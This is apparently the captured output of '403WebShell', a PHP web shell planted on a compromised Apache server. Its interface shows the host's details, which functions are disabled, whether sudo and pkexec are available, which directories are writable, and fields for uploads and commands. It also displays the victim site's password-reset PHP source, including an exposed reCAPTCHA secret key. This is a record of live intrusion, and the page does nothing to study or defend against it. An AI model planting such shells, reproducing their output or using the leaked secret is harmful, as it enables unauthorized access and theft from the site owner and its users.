Uname:Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 3.111.61.48  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/vhost/itms.arukustech.com/public/api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhost/itms.arukustech.com/public/api/forgot_password.php
<?php
require_once __DIR__ . '/../../app/db.php';
require_once __DIR__ . '/../../app/mailer.php';

$secret = "6LfMHT8sAAAAAETLKx0nfpMnvYAK5xiKJHSQWO4P";

$email = trim($_POST['email'] ?? '');
$captcha = $_POST['g-recaptcha-response'] ?? '';

if (!$email || !$captcha) {
    header("Location: /forgot.php?msg=Invalid request");
    exit;
}

/* CAPTCHA VERIFY */
$verify = file_get_contents(
    "https://www.google.com/recaptcha/api/siteverify?secret=$secret&response=$captcha"
);
$resp = json_decode($verify, true);

if (!$resp['success']) {
    header("Location: /forgot.php?msg=Captcha verification failed");
    exit;
}

$pdo = db();

/* CHECK USER */
$st = $pdo->prepare("SELECT id FROM users WHERE email=? AND status=1");
$st->execute([$email]);
if (!$st->fetch()) {
    header("Location: /forgot.php?msg=Email not found");
    exit;
}

/* GENERATE OTP */
$otp = random_int(100000, 999999);
$otp_hash = password_hash($otp, PASSWORD_DEFAULT);
$expiry = date("Y-m-d H:i:s", strtotime("+10 minutes"));

$pdo->prepare("DELETE FROM password_otps WHERE email=?")->execute([$email]);

$pdo->prepare("
    INSERT INTO password_otps (email, otp_hash, expires_at)
    VALUES (?,?,?)
")->execute([$email, $otp_hash, $expiry]);

/* SEND EMAIL */
$subject = "Your Password Reset OTP";
$body = "
<p>Your OTP is:</p>
<h2>$otp</h2>
<p>Valid for <b>10 minutes</b>.</p>
<p>If you didn�t request this, ignore this email.</p>
";

if (!sendMail($email, $subject, $body)) {
    header("Location: /forgot.php?msg=Failed to send email");
    exit;
}

header("Location: /reset.php?email=" . urlencode($email));
exit;

Youez - 2016 - github.com/yon3zu
LinuXploit